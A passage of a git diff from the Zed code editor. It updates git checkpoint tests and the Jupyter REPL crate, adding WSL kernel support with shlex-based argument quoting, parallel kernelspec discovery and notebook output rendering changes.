- .expect("src/deleted.rs"); - assert_eq!((stat.added, stat.deleted), (0, 1)); - - // --- MergeBase (not implemented in FakeGitRepository) --- - let stats = cx - .update(|cx| { - repository.update(cx, |repo, cx| { - repo.diff_stat( - DiffType::MergeBase { - base_ref: "main".into(), - }, - cx, - ) - }) + // 6. diff_checkpoints: same checkpoint => empty diff + let diff = repository + .update(cx, |repository, _| { + repository.diff_checkpoints(checkpoint_1.clone(), checkpoint_1.clone()) }) .await .unwrap() .unwrap(); + assert!( + diff.is_empty(), + "diff of identical checkpoints should be empty" + ); + // 7. diff_checkpoints: different checkpoints => non-empty diff mentioning the changed file + let diff = repository + .update(cx, |repository, _| { + repository.diff_checkpoints(checkpoint_1.clone(), checkpoint_2.clone()) + }) + .await + .unwrap() + .unwrap(); + assert!( + !diff.is_empty(), + "diff of different checkpoints should be non-empty" + ); + assert!( + diff.contains("file.txt"), + "diff should mention the changed file" + ); + assert!( + diff.contains("original content"), + "diff should contain removed content" + ); assert!( - stats.is_empty(), - "MergeBase diff_stat should return empty from FakeGitRepository" + diff.contains("modified content"), + "diff should contain added content" ); + + // 8. restore_checkpoint: restore to original state + repository + .update(cx, |repository, _| { + repository.restore_checkpoint(checkpoint_1.clone()) + }) + .await + .unwrap() + .unwrap(); + cx.run_until_parked(); + + // 9. Create a checkpoint after restore + let checkpoint_3 = repository + .update(cx, |repository, _| repository.checkpoint()) + .await + .unwrap() + .unwrap(); + + // 10. compare_checkpoints: restored state matches original + let equal = repository + .update(cx, |repository, _| { + repository.compare_checkpoints(checkpoint_1.clone(), checkpoint_3.clone()) + }) + .await + .unwrap() + .unwrap(); + assert!(equal, "restored state should match original checkpoint"); + + // 11. diff_checkpoints: restored state vs original => empty diff + let diff = repository + .update(cx, |repository, _| { + repository.diff_checkpoints(checkpoint_1.clone(), checkpoint_3.clone()) + }) + .await + .unwrap() + .unwrap(); + assert!(diff.is_empty(), "diff after restore should be empty"); } #[gpui::test] @@ -2065,27 +2168,12 @@ async fn test_remote_agent_fs_tool_calls(cx: &mut TestAppContext, server_cx: &mu let action_log = cx.new(|_| action_log::ActionLog::new(project.clone())); - // Create a minimal thread for the ReadFileTool - let context_server_registry = - cx.new(|cx| agent::ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let input = ReadFileToolInput { path: "project/b.txt".into(), start_line: None, end_line: None, }; - let read_tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let read_tool = Arc::new(ReadFileTool::new(project, action_log, true)); let (event_stream, _) = ToolCallEventStream::test(); let exists_result = cx.update(|cx| { @@ -2170,7 +2258,6 @@ async fn test_remote_external_agent_server( .get_command( HashMap::from_iter([("OTHER_VAR".into(), "other-val".into())]), None, - None, &mut cx.to_async(), ) }) diff --git a/crates/repl/Cargo.toml b/crates/repl/Cargo.toml index 7bf63657bdea126d7a3f77681e587521356f9eb1..5477c1c5107e7450ad2eaeaba6a880256b62f30f 100644 --- a/crates/repl/Cargo.toml +++ b/crates/repl/Cargo.toml @@ -47,11 +47,13 @@ runtimelib.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true +shlex.workspace = true smol.workspace = true telemetry.workspace = true terminal.workspace = true terminal_view.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true uuid.workspace = true @@ -61,7 +63,6 @@ zed_actions.workspace = true [dev-dependencies] editor = { workspace = true, features = ["test-support"] } -env_logger.workspace = true gpui = { workspace = true, features = ["test-support"] } http_client = { workspace = true, features = ["test-support"] } indoc.workspace = true diff --git a/crates/repl/src/components/kernel_options.rs b/crates/repl/src/components/kernel_options.rs index 3b9535767b64dd3e674020035778dffad1601fc6..ce68a4d30285fe04427c54aa8d5fbdc3aa059648 100644 --- a/crates/repl/src/components/kernel_options.rs +++ b/crates/repl/src/components/kernel_options.rs @@ -27,6 +27,7 @@ fn build_grouped_entries(store: &ReplStore, worktree_id: WorktreeId) -> Vec Vec { + KernelSpecification::JupyterServer(_) | KernelSpecification::SshRemote(_) => { remote_kernels.push(KernelPickerEntry::Kernel { spec: spec.clone(), is_recommended, }); } + KernelSpecification::WslRemote(_) => { + wsl_kernels.push(KernelPickerEntry::Kernel { + spec: spec.clone(), + is_recommended, + }); + } } } @@ -105,6 +110,12 @@ fn build_grouped_entries(store: &ReplStore, worktree_id: WorktreeId) -> Vec None, + KernelSpecification::WslRemote(_) => Some(spec.path().to_string()), KernelSpecification::PythonEnv(_) | KernelSpecification::JupyterServer(_) - | KernelSpecification::SshRemote(_) - | KernelSpecification::WslRemote(_) => { + | KernelSpecification::SshRemote(_) => { let env_kind = spec.environment_kind_label(); let path = spec.path(); match env_kind { @@ -420,10 +431,11 @@ impl PickerDelegate for KernelPickerDelegate { .gap_4() .child( Button::new("kernel-docs", "Kernel Docs") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::End) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, _, cx| cx.open_url(KERNEL_DOCS_URL)), ) .into_any(), @@ -437,7 +449,9 @@ where TT: Fn(&mut Window, &mut App) -> AnyView + 'static, { fn render(self, window: &mut Window, cx: &mut App) -> impl IntoElement { - let store = ReplStore::global(cx).read(cx); + let store = ReplStore::global(cx); + store.update(cx, |store, cx| store.ensure_kernelspecs(cx)); + let store = store.read(cx); let all_entries = build_grouped_entries(store, self.worktree_id); let selected_kernelspec = store.active_kernelspec(self.worktree_id, None, cx); diff --git a/crates/repl/src/kernels/mod.rs b/crates/repl/src/kernels/mod.rs index 9ec2ddb497f8c265b51dcfce58d0946d331d87d2..9f08876cd39f4b7441d8c97bd1d5344b944b09ff 100644 --- a/crates/repl/src/kernels/mod.rs +++ b/crates/repl/src/kernels/mod.rs @@ -9,6 +9,7 @@ pub use native_kernel::*; mod remote_kernels; use project::{Project, ProjectPath, Toolchains, WorktreeId}; +use remote::RemoteConnectionOptions; pub use remote_kernels::*; mod ssh_kernel; @@ -176,6 +177,13 @@ impl PythonEnvKernelSpecification { kernelspec: self.kernelspec.clone(), } } + + pub fn is_uv(&self) -> bool { + matches!( + self.environment_kind.as_deref(), + Some("uv" | "uv (Workspace)") + ) + } } #[derive(Debug, Clone, PartialEq, Eq)] @@ -238,7 +246,7 @@ impl KernelSpecification { Self::PythonEnv(spec) => spec.name.clone().into(), Self::JupyterServer(spec) => spec.name.clone().into(), Self::SshRemote(spec) => spec.name.clone().into(), - Self::WslRemote(spec) => spec.name.clone().into(), + Self::WslRemote(spec) => spec.kernelspec.display_name.clone().into(), } } @@ -262,7 +270,7 @@ impl KernelSpecification { Self::PythonEnv(spec) => spec.path.to_string_lossy().into_owned(), Self::JupyterServer(spec) => spec.url.to_string(), Self::SshRemote(spec) => spec.path.to_string(), - Self::WslRemote(_) => "WSL".to_string(), + Self::WslRemote(spec) => spec.distro.clone(), }) } @@ -348,7 +356,16 @@ pub fn python_env_kernel_specifications( ) -> impl Future>> + use<> { let python_language = LanguageName::new_static("Python"); let is_remote = project.read(cx).is_remote(); - log::info!("python_env_kernel_specifications: is_remote: {}", is_remote); + let wsl_distro = project + .read(cx) + .remote_connection_options(cx) + .and_then(|opts| { + if let RemoteConnectionOptions::Wsl(wsl) = opts { + Some(wsl.distro_name) + } else { + None + } + }); let toolchains = project.read(cx).available_toolchains( ProjectPath { @@ -383,6 +400,7 @@ pub fn python_env_kernel_specifications( .flatten() .chain(toolchains.toolchains) .map(|toolchain| { + let wsl_distro = wsl_distro.clone(); background_executor.spawn(async move { // For remote projects, we assume python is available assuming toolchain is reported. // We can skip the `ipykernel` check or run it remotely. @@ -390,10 +408,6 @@ pub fn python_env_kernel_specifications( // `new_smol_command` runs locally. We need to run remotely if `is_remote`. if is_remote { - log::info!( - "python_env_kernel_specifications: returning SshRemote for toolchain {}", - toolchain.name - ); let default_kernelspec = JupyterKernelspec { argv: vec![ toolchain.path.to_string(), @@ -409,6 +423,22 @@ pub fn python_env_kernel_specifications( env: None, }; + if let Some(distro) = wsl_distro { + log::debug!( + "python_env_kernel_specifications: returning WslRemote for toolchain {}", + toolchain.name + ); + return Some(KernelSpecification::WslRemote(WslKernelSpecification { + name: toolchain.name.to_string(), + kernelspec: default_kernelspec, + distro, + })); + } + + log::debug!( + "python_env_kernel_specifications: returning SshRemote for toolchain {}", + toolchain.name + ); return Some(KernelSpecification::SshRemote( SshRemoteKernelSpecification { name: format!("Remote {}", toolchain.name), @@ -480,11 +510,11 @@ pub fn python_env_kernel_specifications( }); #[allow(unused_mut)] - let mut kernel_specs: Vec = futures::future::join_all(kernelspecs) - .await - .into_iter() - .flatten() - .collect(); + let mut kernel_specs: Vec = futures::stream::iter(kernelspecs) + .buffer_unordered(4) + .filter_map(|x| async move { x }) + .collect::>() + .await; #[cfg(target_os = "windows")] if kernel_specs.is_empty() && !is_remote { diff --git a/crates/repl/src/kernels/native_kernel.rs b/crates/repl/src/kernels/native_kernel.rs index daefe99fef81b26f9bb9977a70075285fb4b4821..d7ee106cab6f1769b42e6958a69e39bffec44b3a 100644 --- a/crates/repl/src/kernels/native_kernel.rs +++ b/crates/repl/src/kernels/native_kernel.rs @@ -19,7 +19,7 @@ use std::{ path::PathBuf, sync::Arc, }; -use util::command::Command; + use uuid::Uuid; use super::{KernelSession, RunningKernel, start_kernel_tasks}; @@ -41,7 +41,7 @@ impl Eq for LocalKernelSpecification {} impl LocalKernelSpecification { #[must_use] - fn command(&self, connection_path: &PathBuf) -> Result { + fn command(&self, connection_path: &PathBuf) -> Result { let argv = &self.kernelspec.argv; anyhow::ensure!(!argv.is_empty(), "Empty argv in kernelspec {}", self.name); @@ -52,7 +52,7 @@ impl LocalKernelSpecification { self.name ); - let mut cmd = util::command::new_command(&argv[0]); + let mut cmd = util::command::new_std_command(&argv[0]); for arg in &argv[1..] { if arg == "{connection_file}" { @@ -91,7 +91,7 @@ async fn peek_ports(ip: IpAddr) -> Result<[u16; 5]> { } pub struct NativeRunningKernel { - pub process: util::command::Child, + pub process: util::process::Child, connection_path: PathBuf, _process_status_task: Option>, pub working_directory: PathBuf, @@ -104,7 +104,7 @@ pub struct NativeRunningKernel { impl Debug for NativeRunningKernel { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { f.debug_struct("RunningKernel") - .field("process", &self.process) + .field("process", &*self.process) .finish() } } @@ -146,15 +146,14 @@ impl NativeRunningKernel { fs.atomic_write(connection_path.clone(), content).await?; let mut cmd = kernel_specification.command(&connection_path)?; - - let mut process = cmd - .current_dir(&working_directory) - .stdout(util::command::Stdio::piped()) - .stderr(util::command::Stdio::piped()) - .stdin(util::command::Stdio::piped()) - .kill_on_drop(true) - .spawn() - .context("failed to start the kernel process")?; + cmd.current_dir(&working_directory); + + let mut process = util::process::Child::spawn( + cmd, + std::process::Stdio::piped(), + std::process::Stdio::piped(), + std::process::Stdio::piped(), + )?; let session_id = Uuid::new_v4().to_string(); diff --git a/crates/repl/src/kernels/wsl_kernel.rs b/crates/repl/src/kernels/wsl_kernel.rs index 1cdb774008d6a40e57b0abeeec73e294896c221a..d9ac05c5fc8c2cb756898ff449d6714b78cb7997 100644 --- a/crates/repl/src/kernels/wsl_kernel.rs +++ b/crates/repl/src/kernels/wsl_kernel.rs @@ -21,6 +21,7 @@ use std::{ path::PathBuf, sync::Arc, }; + use uuid::Uuid; // Find a set of open ports. This creates a listener with port set to 0. The listener will be closed at the end when it goes out of scope. @@ -56,6 +57,15 @@ impl Debug for WslRunningKernel { } } +fn quote_posix_shell_arguments(arguments: &[String]) -> Result { + let mut quoted_arguments = Vec::with_capacity(arguments.len()); + for argument in arguments { + let quoted = shlex::try_quote(argument).map(|quoted| quoted.into_owned())?; + quoted_arguments.push(quoted); + } + Ok(quoted_arguments.join(" ")) +} + impl WslRunningKernel { pub fn new( kernel_specification: WslKernelSpecification, @@ -129,9 +139,8 @@ impl WslRunningKernel { // `wsl -d --exec ...` // But we need to replace {connection_file} with wsl_connection_path. - let argv = kernel_specification.kernelspec.argv; anyhow::ensure!( - !argv.is_empty(), + !kernel_specification.kernelspec.argv.is_empty(), "Empty argv in kernelspec {}", kernel_specification.name ); @@ -182,50 +191,57 @@ impl WslRunningKernel { // We use bash -lc to run in a login shell for proper environment setup let mut kernel_args: Vec = Vec::new(); - if let Some(env) = &kernel_specification.kernelspec.env { - if !env.is_empty() { - kernel_args.push("env".to_string()); - for (k, v) in env { - kernel_args.push(format!("{}={}", k, v)); + let resolved_argv: Vec = kernel_specification + .kernelspec + .argv + .iter() + .map(|arg| { + if arg == "{connection_file}" { + wsl_connection_path.clone() + } else { + arg.clone() } + }) + .collect(); + + let executable = resolved_argv.first().map(String::as_str); + let needs_python_resolution = executable.map_or(false, |executable| { + executable == "python" || executable == "python3" || !executable.starts_with('/') + }); + + let mut env_assignments: Vec = Vec::new(); + if let Some(env) = &kernel_specification.kernelspec.env { + env_assignments.reserve(env.len()); + for (key, value) in env { + let assignment = format!("{key}={value}"); + let assignment = shlex::try_quote(&assignment) + .map(|quoted| quoted.into_owned())?; + env_assignments.push(assignment); } - } - for arg in argv { - if arg == "{connection_file}" { - kernel_args.push(wsl_connection_path.clone()); - } else { - kernel_args.push(arg.clone()); + if !env_assignments.is_empty() { + kernel_args.push("env".to_string()); + kernel_args.extend(env_assignments.iter().cloned()); } } - // because first command is python/python3 we need make sure it's present in the env - let first_cmd = kernel_args.first().map(|arg| { - arg.split_whitespace().next().unwrap_or(arg) - }); - - let needs_python_resolution = first_cmd.map_or(false, |cmd| { - cmd == "python" || cmd == "python3" || !cmd.starts_with('/') - }); + kernel_args.extend(resolved_argv.iter().cloned()); let shell_command = if needs_python_resolution { // 1. Check for .venv/bin/python or .venv/bin/python3 in working directory // 2. Fall back to system python3 or python - let rest_args: Vec = kernel_args.iter().skip(1).cloned().collect(); - let rest_string = rest_args - .iter() - .map(|arg| { - if arg.contains(' ') || arg.contains('\'') || arg.contains('"') { - format!("'{}'", arg.replace('\'', "'\\''")) - } else { - arg.clone() - } - }) - .collect::>() - .join(" "); + let rest_args: Vec = resolved_argv.iter().skip(1).cloned().collect(); + let arg_string = quote_posix_shell_arguments(&rest_args)?; + let set_env_command = if env_assignments.is_empty() { + String::new() + } else { + format!("export {}; ", env_assignments.join(" ")) + }; let cd_command = if let Some(wd) = wsl_working_directory.as_ref() { - format!("cd '{}' && ", wd.replace('\'', "'\\''")) + let quoted_wd = shlex::try_quote(wd) + .map(|quoted| quoted.into_owned())?; + format!("cd {quoted_wd} && ") } else { String::new() }; @@ -233,6 +249,7 @@ impl WslRunningKernel { format!( "set -e; \ + {} \ {} \ echo \"Working directory: $(pwd)\" >&2; \ if [ -x .venv/bin/python ]; then \ @@ -254,20 +271,26 @@ impl WslRunningKernel { echo 'PATH:' \"$PATH\" >&2; \ exit 127; \ fi", - cd_command, rest_string, rest_string, rest_string, rest_string + cd_command, set_env_command, arg_string, arg_string, arg_string, arg_string ) } else { - kernel_args - .iter() - .map(|arg| { - if arg.contains(' ') || arg.contains('\'') || arg.contains('"') { - format!("'{}'", arg.replace('\'', "'\\''")) - } else { - arg.clone() - } - }) - .collect::>() - .join(" ") + let args_string = quote_posix_shell_arguments(&resolved_argv)?; + + let cd_command = if let Some(wd) = wsl_working_directory.as_ref() { + let quoted_wd = shlex::try_quote(wd) + .map(|quoted| quoted.into_owned())?; + format!("cd {quoted_wd} && ") + } else { + String::new() + }; + + let env_prefix_inline = if !env_assignments.is_empty() { + format!("env {} ", env_assignments.join(" ")) + } else { + String::new() + }; + + format!("{cd_command}exec {env_prefix_inline}{args_string}") }; cmd.arg("bash") @@ -571,8 +594,20 @@ pub async fn wsl_kernel_specifications( }) }) .collect::>(); + } else if let Err(e) = + serde_json::from_str::(&json_str) + { + log::error!( + "wsl_kernel_specifications parse error: {} \nJSON: {}", + e, + json_str + ); } + } else { + log::error!("wsl_kernel_specifications command failed"); } + } else if let Err(e) = output { + log::error!("wsl_kernel_specifications command execution failed: {}", e); } Vec::new() diff --git a/crates/repl/src/notebook/cell.rs b/crates/repl/src/notebook/cell.rs index d66261698b722cfcd0f547e09d84cf83a0d2b1a6..ba70e50f8cbccc32bef5de5c1864a3d8db46aa89 100644 --- a/crates/repl/src/notebook/cell.rs +++ b/crates/repl/src/notebook/cell.rs @@ -1,20 +1,18 @@ -#![allow(unused, dead_code)] use std::sync::Arc; use std::time::{Duration, Instant}; use editor::{Editor, EditorMode, MultiBuffer, SizingBehavior}; use futures::future::Shared; use gpui::{ - App, Entity, EventEmitter, Focusable, Hsla, InteractiveElement, KeyContext, - RetainAllImageCache, StatefulInteractiveElement, Task, TextStyleRefinement, image_cache, - prelude::*, + App, Entity, EventEmitter, Focusable, Hsla, InteractiveElement, RetainAllImageCache, + StatefulInteractiveElement, Task, TextStyleRefinement, prelude::*, }; use language::{Buffer, Language, LanguageRegistry}; use markdown::{Markdown, MarkdownElement, MarkdownStyle}; use nbformat::v4::{CellId, CellMetadata, CellType}; use runtimelib::{JupyterMessage, JupyterMessageContent}; use settings::Settings as _; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{CommonAnimationExt, IconButtonShape, prelude::*}; use util::ResultExt; @@ -236,7 +234,7 @@ pub trait RenderableCell: Render { fn source(&self) -> &String; fn selected(&self) -> bool; fn set_selected(&mut self, selected: bool) -> &mut Self; - fn selected_bg_color(&self, window: &mut Window, cx: &mut Context) -> Hsla { + fn selected_bg_color(&self, _window: &mut Window, cx: &mut Context) -> Hsla { if self.selected() { let mut color = cx.theme().colors().element_hover; color.fade_out(0.5); @@ -253,7 +251,7 @@ pub trait RenderableCell: Render { fn cell_position_spacer( &self, is_first: bool, - window: &mut Window, + _window: &mut Window, cx: &mut Context, ) -> Option { let cell_position = self.cell_position(); @@ -328,7 +326,6 @@ pub struct MarkdownCell { editing: bool, selected: bool, cell_position: Option, - languages: Arc, _editor_subscription: gpui::Subscription, } @@ -386,7 +383,6 @@ impl MarkdownCell { let markdown = cx.new(|cx| Markdown::new(source.clone().into(), None, None, cx)); - let cell_id = id.clone(); let editor_subscription = cx.subscribe(&editor, move |this, _editor, event, cx| match event { editor::EditorEvent::Blurred => { @@ -410,7 +406,6 @@ impl MarkdownCell { editing: start_editing, selected: false, cell_position: None, - languages, _editor_subscription: editor_subscription, } } @@ -461,8 +456,6 @@ impl MarkdownCell { .unwrap_or_default(); self.source = source.clone(); - let languages = self.languages.clone(); - self.markdown.update(cx, |markdown, cx| { markdown.reset(source.into(), cx); }); @@ -606,7 +599,7 @@ pub struct CodeCell { outputs: Vec, selected: bool, cell_position: Option, - language_task: Task<()>, + _language_task: Task<()>, execution_start_time: Option, execution_duration: Option, is_executing: bool, @@ -670,10 +663,10 @@ impl CodeCell { outputs: Vec::new(), selected: false, cell_position: None, - language_task, execution_start_time: None, execution_duration: None, is_executing: false, + _language_task: language_task, } } @@ -748,10 +741,10 @@ impl CodeCell { outputs, selected: false, cell_position: None, - language_task, execution_start_time: None, execution_duration: None, is_executing: false, + _language_task: language_task, } } @@ -879,15 +872,7 @@ impl CodeCell { cx.notify(); } - fn output_control(&self) -> Option { - if self.has_outputs() { - Some(CellControlType::ClearCell) - } else { - None - } - } - - pub fn gutter_output(&self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + pub fn gutter_output(&self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { let is_selected = self.selected(); div() @@ -948,7 +933,7 @@ impl RenderableCell for CodeCell { &self.source } - fn control(&self, window: &mut Window, cx: &mut Context) -> Option { + fn control(&self, _window: &mut Window, cx: &mut Context) -> Option { let control_type = if self.has_outputs() { CellControlType::RerunCell } else { @@ -1038,8 +1023,7 @@ impl RenderableCell for CodeCell { } impl RunnableCell for CodeCell { - fn run(&mut self, window: &mut Window, cx: &mut Context) { - println!("Running code cell: {}", self.id); + fn run(&mut self, _window: &mut Window, cx: &mut Context) { cx.emit(CellEvent::Run(self.id.clone())); } @@ -1062,11 +1046,8 @@ impl Render for CodeCell { } else { None }; - let output_max_width = plain::max_width_for_columns( - ReplSettings::get_global(cx).output_max_width_columns, - window, - cx, - ); + let output_max_width = + plain::max_width_for_columns(ReplSettings::get_global(cx).max_columns, window, cx); // get the language from the editor's buffer let language_name = self .editor @@ -1198,41 +1179,23 @@ impl Render for CodeCell { }, ) // output at bottom - .child(div().w_full().children(self.outputs.iter().map( - |output| { - let content = match output { - Output::Plain { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::Markdown { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::Stream { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::Image { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::Message(message) => Some( - div() - .child(message.clone()) - .into_any_element(), - ), - Output::Table { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::Json { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::ErrorOutput(error_view) => { - error_view.render(window, cx) - } - Output::ClearOutputWaitMarker => None, - }; - - div().children(content) - }, - ))), + .child( + div() + .id(( + ElementId::from(self.id.to_string()), + "output-scroll", + )) + .w_full() + .when_some(output_max_width, |div, max_width| { + div.max_w(max_width).overflow_x_scroll() + }) + .when_some(output_max_height, |div, max_height| { + div.max_h(max_height).overflow_y_scroll() + }) + .children(self.outputs.iter().map(|output| { + div().children(output.content(window, cx)) + })), + ), ), ), ) diff --git a/crates/repl/src/notebook/notebook_ui.rs b/crates/repl/src/notebook/notebook_ui.rs index 5b8c0746cdf1289ac3c612139fab1819b5596c07..76a0d2a47037f0ccd48fcfe9cb088ceb9e37aeaa 100644 --- a/crates/repl/src/notebook/notebook_ui.rs +++ b/crates/repl/src/notebook/notebook_ui.rs @@ -1117,10 +1117,11 @@ impl NotebookEditor { worktree_id, Button::new("kernel-selector", kernel_name.clone()) .label_size(LabelSize::Small) - .icon(status_icon) - .icon_size(IconSize::Small) - .icon_color(status_color) - .icon_position(IconPosition::Start), + .start_icon( + Icon::new(status_icon) + .size(IconSize::Small) + .color(status_color), + ), Tooltip::text(format!( "Kernel: {} ({}). Click to change.", kernel_name, @@ -1514,6 +1515,9 @@ impl project::ProjectItem for NotebookItem { nbformat::upgrade_legacy_notebook(legacy_notebook)? } + nbformat::Notebook::V3(v3_notebook) => { + nbformat::upgrade_v3_notebook(v3_notebook)? + } } }; @@ -1791,6 +1795,9 @@ impl Item for NotebookEditor { Ok(nbformat::Notebook::Legacy(legacy_notebook)) => { nbformat::upgrade_legacy_notebook(legacy_notebook)? } + Ok(nbformat::Notebook::V3(v3_notebook)) => { + nbformat::upgrade_v3_notebook(v3_notebook)? + } Err(e) => { anyhow::bail!("Failed to parse notebook: {:?}", e); } diff --git a/crates/repl/src/outputs.rs b/crates/repl/src/outputs.rs index 8be8c57cceee84435a6d99ba5c611d24c563bec3..ad0bd56858636bf8fbd2501bab28aae25b99c2a0 100644 --- a/crates/repl/src/outputs.rs +++ b/crates/repl/src/outputs.rs @@ -253,18 +253,8 @@ impl Output { ) } - pub fn render( - &self, - workspace: WeakEntity, - window: &mut Window, - cx: &mut Context, - ) -> impl IntoElement + use<> { - let max_width = plain::max_width_for_columns( - ReplSettings::get_global(cx).output_max_width_columns, - window, - cx, - ); - let content = match self { + pub fn content(&self, window: &mut Window, cx: &mut App) -> Option { + match self { Self::Plain { content, .. } => Some(content.clone().into_any_element()), Self::Markdown { content, .. } => Some(content.clone().into_any_element()), Self::Stream { content, .. } => Some(content.clone().into_any_element()), @@ -274,21 +264,36 @@ impl Output { Self::Json { content, .. } => Some(content.clone().into_any_element()), Self::ErrorOutput(error_view) => error_view.render(window, cx), Self::ClearOutputWaitMarker => None, - }; + } + } - let needs_horizontal_scroll = matches!(self, Self::Table { .. } | Self::Image { .. }); + pub fn render( + &self, + workspace: WeakEntity, + window: &mut Window, + cx: &mut Context, + ) -> impl IntoElement + use<> { + let max_width = + plain::max_width_for_columns(ReplSettings::get_global(cx).max_columns, window, cx); + let content = self.content(window, cx); + + let needs_horizontal_scroll = matches!(self, Self::Table { .. }); h_flex() .id("output-content") .w_full() - .when_some(max_width, |this, max_w| this.max_w(max_w)) - .overflow_x_scroll() + .when_else( + needs_horizontal_scroll, + |this| this.overflow_x_scroll(), + |this| this.overflow_x_hidden(), + ) .items_start() .child( div() .when(!needs_horizontal_scroll, |el| { el.flex_1().w_full().overflow_x_hidden() }) + .when_some(max_width, |el, max_width| el.max_w(max_width)) .children(content), ) .children(match self { @@ -890,7 +895,7 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); let fs = project::FakeFs::new(cx.background_executor.clone()); let project = project::Project::test(fs, [] as [&Path; 0], cx).await; diff --git a/crates/repl/src/outputs/image.rs b/crates/repl/src/outputs/image.rs index 9d1ffa3d2065281cd69e67b2faf960c9aa690bcb..e5444be3d779c9541fcadd55b9255d3e25da0cba 100644 --- a/crates/repl/src/outputs/image.rs +++ b/crates/repl/src/outputs/image.rs @@ -3,10 +3,10 @@ use base64::{ Engine as _, alphabet, engine::{DecodePaddingMode, GeneralPurpose, GeneralPurposeConfig}, }; -use gpui::{App, ClipboardItem, Image, ImageFormat, RenderImage, Window, img}; +use gpui::{App, ClipboardItem, Image, ImageFormat, Pixels, RenderImage, Window, img}; use settings::Settings as _; use std::sync::Arc; -use ui::{IntoElement, Styled, div, prelude::*}; +use ui::{IntoElement, Styled, prelude::*}; use crate::outputs::{OutputContent, plain}; use crate::repl_settings::ReplSettings; @@ -113,7 +113,7 @@ impl Render for ImageView { let settings = ReplSettings::get_global(cx); let line_height = window.line_height(); - let max_width = plain::max_width_for_columns(settings.output_max_width_columns, window, cx); + let max_width = plain::max_width_for_columns(settings.max_columns, window, cx); let max_height = if settings.output_max_height_lines > 0 { Some(line_height * settings.output_max_height_lines as f32) @@ -125,7 +125,7 @@ impl Render for ImageView { let image = self.image.clone(); - div().h(height).w(width).child(img(image)) + img(image).w(width).h(height) } } diff --git a/crates/repl/src/outputs/plain.rs b/crates/repl/src/outputs/plain.rs index 0db2f811fb9ca3b82114db23826e37fe699bd3a0..bc6d04019ce0129529a886e827c3f2ec8e6574ce 100644 --- a/crates/repl/src/outputs/plain.rs +++ b/crates/repl/src/outputs/plain.rs @@ -22,12 +22,12 @@ use alacritty_terminal::{ term::Config, vte::ansi::Processor, }; -use gpui::{Bounds, ClipboardItem, Entity, FontStyle, TextStyle, WhiteSpace, canvas, size}; +use gpui::{Bounds, ClipboardItem, Entity, FontStyle, Pixels, TextStyle, WhiteSpace, canvas, size}; use language::Buffer; use settings::Settings as _; use terminal::terminal_settings::TerminalSettings; use terminal_view::terminal_element::TerminalElement; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{IntoElement, prelude::*}; use crate::outputs::OutputContent; @@ -275,7 +275,7 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); cx.add_empty_window() } diff --git a/crates/repl/src/outputs/table.rs b/crates/repl/src/outputs/table.rs index f6bf30f394d2232750f7f1beb21dbbc27c0ba941..fc5ccaf75a5b25ba9b32db68e47a96d876f68cf7 100644 --- a/crates/repl/src/outputs/table.rs +++ b/crates/repl/src/outputs/table.rs @@ -59,7 +59,7 @@ use runtimelib::datatable::TableSchema; use runtimelib::media::datatable::TabularDataResource; use serde_json::Value; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{IntoElement, Styled, div, prelude::*, v_flex}; use util::markdown::MarkdownEscaped; diff --git a/crates/repl/src/repl.rs b/crates/repl/src/repl.rs index f17cf8dfba5f5e0e950bd5f2967a6b20d2eebb51..8c3d15a2ad2dfdd18976d750c71e2b3cfb0393a4 100644 --- a/crates/repl/src/repl.rs +++ b/crates/repl/src/repl.rs @@ -46,11 +46,9 @@ fn zed_dispatcher(cx: &mut App) -> impl Dispatcher { impl Dispatcher for ZedDispatcher { #[track_caller] fn dispatch(&self, runnable: Runnable) { - use std::sync::{Arc, atomic::AtomicBool}; let location = core::panic::Location::caller(); - let closed = Arc::new(AtomicBool::new(false)); let (wrapper, task) = async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn(|_| async move { runnable.run() }, { let dispatcher = self.dispatcher.clone(); move |r| dispatcher.dispatch(r, Priority::default()) @@ -61,11 +59,9 @@ fn zed_dispatcher(cx: &mut App) -> impl Dispatcher { #[track_caller] fn dispatch_after(&self, duration: Duration, runnable: Runnable) { - use std::sync::{Arc, atomic::AtomicBool}; let location = core::panic::Location::caller(); - let closed = Arc::new(AtomicBool::new(false)); let (wrapper, task) = async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn(|_| async move { runnable.run() }, { let dispatcher = self.dispatcher.clone(); move |r| dispatcher.dispatch_after(duration, r) diff --git a/crates/repl/src/repl_editor.rs b/crates/repl/src/repl_editor.rs index 6e061c3e2e37aa94074f17f94791ad147f56f344..61bed513a16c3b9baf885714110c3de78a7094d5 100644 --- a/crates/repl/src/repl_editor.rs +++ b/crates/repl/src/repl_editor.rs @@ -87,6 +87,7 @@ pub fn install_ipykernel_and_assign( let python_path = env_spec.path.clone(); let env_name = env_spec.name.clone(); + let is_uv = env_spec.is_uv(); let env_spec = env_spec.clone(); struct 